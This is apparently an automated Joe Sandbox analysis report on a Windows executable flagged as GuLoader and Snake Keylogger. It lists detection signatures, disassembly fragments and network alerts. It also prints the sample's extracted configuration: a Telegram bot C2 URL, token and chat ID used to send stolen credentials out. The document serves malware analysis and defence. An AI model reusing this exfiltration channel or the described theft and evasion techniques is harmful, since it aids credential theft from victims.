Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Justificante67ab404ffe31b359e00a499e656454545.exe

Overview

General Information

Sample name:Justificante67ab404ffe31b359e00a499e656454545.exe
Analysis ID:1615359
MD5:b1311507ccad8738e432250721633828
SHA1:0a8c23e3f5f4e0c9517c5c44dd42ff4f5741f8c5
SHA256:738b4545d501e7f240c2f1e3cf98218f703b4ee08d529c87aca5b8270aac4643
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000004.00000002.2954634470.0000000032E9A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2049807822.00000000028B7000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-14T20:00:42.201672+010028033053Unknown Traffic192.168.2.449741104.21.32.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-14T20:00:40.460712+010028032742Potentially Bad Traffic192.168.2.449739158.101.44.24280TCP
            2025-02-14T20:00:41.570275+010028032742Potentially Bad Traffic192.168.2.449739158.101.44.24280TCP
            2025-02-14T20:00:42.835736+010028032742Potentially Bad Traffic192.168.2.449742158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-14T20:00:34.584888+010028032702Potentially Bad Traffic192.168.2.449737216.58.206.78443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-14T20:00:59.066295+010018100081Potentially Bad Traffic192.168.2.449819149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-14T20:00:51.851507+010018100071Potentially Bad Traffic192.168.2.449773149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe.6392.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendMessage"}
            Multi AV Scanner detection for submitted file
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeVirustotal: Detection: 29%Perma Link
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeReversingLabs: Detection: 62%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360987A8 CryptUnprotectData,4_2_360987A8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36098EF1 CryptUnprotectData,4_2_36098EF1
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49740 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: Justificante67ab404ffe31b359e00a499e656454545.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0040646B FindFirstFileA,FindClose,4_2_0040646B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004058BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 0255F45Dh4_2_0255F2C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 0255F45Dh4_2_0255F4AC
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 0255F45Dh4_2_0255F52F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 0255FC19h4_2_0255F961
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAD069h4_2_35EACDC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAE1C9h4_2_35EADF20
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EA3308h4_2_35EA2EF0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EA2D41h4_2_35EA2A90
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAFBD9h4_2_35EAF930
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAF781h4_2_35EAF4D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAF329h4_2_35EAF080
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_35EA0040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_35EA0853
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAEED1h4_2_35EAEC28
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAEA79h4_2_35EAE7D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAE621h4_2_35EAE378
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EA0D0Dh4_2_35EA0B30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EA16F8h4_2_35EA0B30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EA3308h4_2_35EA2EEA
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EADD71h4_2_35EADAC8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_35EA0673
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAD919h4_2_35EAD670
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EA3308h4_2_35EA3236
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 35EAD4C1h4_2_35EAD218
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36097EB5h4_2_36097B78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36099280h4_2_36098FB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36096CC1h4_2_36096A18
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 360948C9h4_2_36094620
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36091CF9h4_2_36091A50
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609F136h4_2_3609EE68
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609D146h4_2_3609CE78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36094D21h4_2_36094A78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36097119h4_2_36096E70
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36092151h4_2_36091EA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36097571h4_2_360972C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36095179h4_2_36094ED0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609F5C6h4_2_3609F2F8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609D5D6h4_2_3609D308
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 360925A9h4_2_36092300
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609B5E6h4_2_3609B318
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 360955D1h4_2_36095328
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 360979C9h4_2_36097720
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36092A01h4_2_36092758
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609FA56h4_2_3609F788
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36095A29h4_2_36095780
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609DA66h4_2_3609D798
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609BA76h4_2_3609B7A8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36092E59h4_2_36092BB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36095E81h4_2_36095BD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 360932B1h4_2_36093008
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609DEF6h4_2_3609DC28
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609BF06h4_2_3609BC38
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 360962D9h4_2_36096030
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 360902E9h4_2_36090040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36093709h4_2_36093460
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36096733h4_2_36096488
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then mov esp, ebp4_2_3609B081
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36090741h4_2_36090498
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609E386h4_2_3609E0B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609C396h4_2_3609C0C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36090B99h4_2_360908F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36090FF1h4_2_36090D48
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609E816h4_2_3609E548
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609C826h4_2_3609C558
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36091449h4_2_360911A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609ECA6h4_2_3609E9D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3609CCB6h4_2_3609C9E8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 360918A1h4_2_360915F8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 361019DEh4_2_36101710
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36106970h4_2_36106678
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36109E08h4_2_36109B10
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36102BE6h4_2_36102918
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610C910h4_2_3610C618
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610E0F8h4_2_3610DE00
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36104BD7h4_2_36104908
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36107300h4_2_36107008
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610B128h4_2_3610AE30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36103506h4_2_36103238
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610DC30h4_2_3610D938
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610F418h4_2_3610F120
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 361054F6h4_2_36105228
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36108620h4_2_36108328
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610C448h4_2_3610C150
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36103E26h4_2_36103B58
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610EF50h4_2_3610EC58
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610030Eh4_2_36100040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36106E38h4_2_36106B40
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36105E16h4_2_36105B48
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36109940h4_2_36109648
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610D768h4_2_3610D470
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36104746h4_2_36104478
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36100C2Eh4_2_36100960
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36108158h4_2_36107E60
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610AC60h4_2_3610A968
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610EA88h4_2_3610E790
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36105066h4_2_36104D98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36107C90h4_2_36107998
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610154Eh4_2_36101280
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36109478h4_2_36109180
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36102756h4_2_36102488
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610BF80h4_2_3610BC88
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610FDA8h4_2_3610FAB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36105986h4_2_361056B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36108FB0h4_2_36108CB8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36101E47h4_2_36101BA0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610A798h4_2_3610A4A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36103076h4_2_36102DA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610D2A0h4_2_3610CFA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610079Eh4_2_361004D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 361077C8h4_2_361074D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36106347h4_2_36105FD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610A2D0h4_2_36109FD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610BAB8h4_2_3610B7C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610E5C0h4_2_3610E2C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 361010BEh4_2_36100DF0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36108AE8h4_2_361087F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 361022C6h4_2_36101FF8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610B5F0h4_2_3610B2F8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610CDD8h4_2_3610CAE0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 361042B6h4_2_36103FE8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 3610F8E0h4_2_3610F5E8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36141FE8h4_2_36141CF0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36141B20h4_2_36141828
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36140338h4_2_36140040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36141190h4_2_36140E98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36140801h4_2_36140508
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36141658h4_2_36141360
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then jmp 36140CC8h4_2_361409D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then push 00000000h4_2_3616537D
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36160F8E
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36160C32
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36160C78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36160BFD

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49773 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49819 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
